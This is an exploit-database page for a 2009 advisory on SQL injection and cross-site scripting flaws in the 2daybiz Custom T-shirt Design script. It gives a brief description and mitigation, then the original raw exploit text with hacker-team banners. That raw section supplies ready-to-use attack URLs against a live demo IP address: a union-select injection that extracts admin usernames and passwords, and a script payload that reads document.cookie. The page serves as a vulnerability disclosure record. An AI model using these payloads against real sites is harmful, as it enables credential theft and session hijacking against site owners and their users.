Custom T-shirt Design (SQL & xss) MULTIPLE Remote Sql Injection

vendor:

Custom T-shirt Design

by:

Snakespc

8,8

CVSS

HIGH

SQL Injection & XSS

89, 79

CWE

Product Name: Custom T-shirt Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Custom T-shirt Design (SQL & xss) MULTIPLE Remote Sql Injection

A remote SQL injection and XSS vulnerability exists in the 2daybiz.com Custom T-shirt Design script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary SQL commands on the underlying database and inject malicious JavaScript code into the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Also, ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
Custom T-shirt Design (SQL & xss) MULTIPLE Remote Sql Injection
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:www.snakespc.com/sc/index.php
Chi3arona houa:
-------------------------SNAKES TEAM-------------------------------------
Script:2daybiz.com
Demo:http://www.2daybiz.com/tshirt_design_download.html
-------------------------SNAKES TEAM-------------------------------------
Exploit:
--------
Demo :sql
http://98.131.92.231/demo/tshirt2/product.php?id=-28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+admin--

Demo: xss
http://98.131.92.231/demo/tshirt2/product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

-------------------------SNAKES TEAM-------------------------------------
His0k4:::Mr.HCOCA_MAN:::DrEaDFuL:::
yassine_enpsunhouse2:::aSSaSSin_HaCkErS
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-15]